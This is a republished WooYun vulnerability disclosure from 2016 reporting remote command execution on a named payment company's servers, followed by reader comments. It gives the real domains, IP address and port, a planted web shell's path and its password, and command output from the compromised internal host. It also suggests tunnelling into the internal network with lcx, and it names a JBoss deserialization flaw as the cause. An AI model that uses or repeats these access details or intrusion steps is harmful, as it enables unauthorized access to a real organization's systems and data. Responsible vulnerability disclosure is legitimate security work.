钱宝主站一处命令执行Getshell

2017年4月14日08:38:45评论332 views字数 220阅读0分44秒阅读模式

摘要

2016-04-01：细节已通知厂商并且等待厂商处理中
2016-04-05：厂商已经确认，细节仅向厂商公开
2016-04-15：细节向核心白帽子及相关领域专家公开
2016-04-25：细节向普通白帽子公开
2016-05-05：细节向实习白帽子公开
2016-05-20：细节向公众公开

漏洞概要关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-191297

漏洞标题：钱宝主站一处命令执行Getshell

漏洞作者：路人甲

提交时间： 2016-04-01 09:49

公开时间： 2016-05-20 09:20

漏洞类型：命令执行

危害等级：中

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：远程命令执行补丁不及时

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

mask 区域

*****bill.*****
 *****bill.*****
 **********
 *****了同一个*****
 **********
 **********
 1.http://**.**.**/_
 2.http://**.**.**
 **********
 *****m*****
 *****a8d2dafac0e4e91b4f23.png&qu*****
 **********
 *****war *****
 3.://**.**.**/obrqemwn/index.jsp_
 4.http://**.**.**/obrqemwn/index.jsp_
 *****02*****
 *****具提*****
 **********
 *****a2a21cefda99a8b4b873.png&qu*****
 **********
 **********
 *****;ipcon*****
 **********
 **********
 *****Config*****
 **********
 **********
 **********
 *****. . . . . .*****
 **********
 *****ix  . . . *****
 **********
 *****. . . . . .*****
 **********
 *****ed. . . . *****
 **********
 *****ed. . . . *****
 **********
 **********
 **********
 *****r 本地*****
 **********
 **********
 **********
 *****fic DNS Su*****
 **********
 *****: Intel(R) PRO/1000*****
 **********
 *****. . . . . : 00*****
 **********
 *****. . . . . *****
 **********
 *****. . . . . . *****
 **********
 *****. . . . . . :*****
 **********
 *****. . . . . . *****
 **********
 *****. . . . . . :*****
 *****de&g*****
 **********
 *****gt;ne*****
 *****        *****
 **********
 *****-------------------*****
 *****                   *****
 *****                   *****
 *****。</*****
 **********
 *****端口 *****

漏洞证明：

wap.globebill.com.cn

www.globebill.com.cn

这两个域名都解析到了同一个地址183.56.160.179

命令执行url

http://wap.globebill.com.cn:8080/

http://www.globebill.com.cn:8080

system权限

直接找个war 传shell

www.globebill.com.cn:8080/obrqemwn/index.jsp

http://183.56.160.179:8080/obrqemwn/index.jsp

密码023

已经被自动化工具提前路过了

内网环境

code 区域

ipconfig /all
 
 
 Windows IP Configuration
 
 
 
    Host Name . . . . . . . . . . . . : old-pos
 
    Primary Dns Suffix  . . . . . . . : 
 
    Node Type . . . . . . . . . . . . : Unknown
 
    IP Routing Enabled. . . . . . . . : No
 
    WINS Proxy Enabled. . . . . . . . : No
 
 
 
 Ethernet adapter 本地连接:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
 
    Physical Address. . . . . . . . . : 00-0C-29-C4-BF-37
 
    DHCP Enabled. . . . . . . . . . . : No
 
    IP Address. . . . . . . . . . . . : 10.10.2.11
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 10.10.2.1
 
    DNS Servers . . . . . . . . . . . : 202.96.134.133

code 区域

net view
 服务器名称            注释
 
 -------------------------------------------------------------------------------
 //OLD-POS                                                                      
 //WIN-EI1RA71FGT9                                                              
 命令成功完成。

可以lcx转发端口进内网

修复方案：

jboss java反序列化命令执行

jboss invoker/JMXInvokerServlet 代码执行

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2016-04-05 09:12

厂商回复：

此漏洞为第三方工程，网络与业务不涉及公司信息。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-06 11:05 | j14n ( 普通白帽子 | Rank:2226 漏洞数:401 )

1

恶心。

1# 回复此人
2016-04-06 11:24 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

1

厂商不友好了！

2# 回复此人
2016-05-20 10:24 | Dusk ( 实习白帽子 | Rank:35 漏洞数:20 )

0

狠狠插他

3# 回复此人
2016-05-20 11:30 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

0

NND!!!!!!不要脸!!

4# 回复此人
2016-05-20 15:33 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

0

又多了个练习站么

5# 回复此人
2016-05-20 18:44 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:490 漏洞数:133 | 乌云核心绿帽子《绿帽子讲婚姻安全》作者)

0

不要脸

6# 回复此人
2016-05-23 14:57 | 菜鸟小Q ( 普通白帽子 | Rank:205 漏洞数:56 | 坚定自己的信仰并一直做下去......)

0

不要脸

7# 回复此人

漏洞概要 关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-191297

漏洞标题： 钱宝主站一处命令执行Getshell

相关厂商： globebill.com.cn

漏洞作者： 路人甲